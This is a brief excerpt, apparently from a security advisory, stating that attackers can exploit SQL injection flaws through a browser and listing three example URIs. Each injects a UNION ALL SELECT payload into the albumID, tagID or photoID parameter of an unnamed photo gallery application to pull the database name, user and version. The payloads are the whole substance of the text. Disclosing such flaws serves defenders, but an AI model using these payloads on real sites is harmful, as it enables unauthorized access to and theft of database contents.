| Code |
Attackers can use a browser to exploit these issues.The following example URIs are available: http://www.example.com/[PATH]/?albumID=-1+UNION+ALL+SELECT+database(),user()%23 http://www.example.com/[PATH]/?tagID=-1+UNION+ALL+SELECT+concat(user(),0x3A3A3A,database())%23 http://www.example.com/[PATH]/?photoID=-1+UNION+ALL+SELECT+concat(user(),0x3A3A3A,version()),2%23 |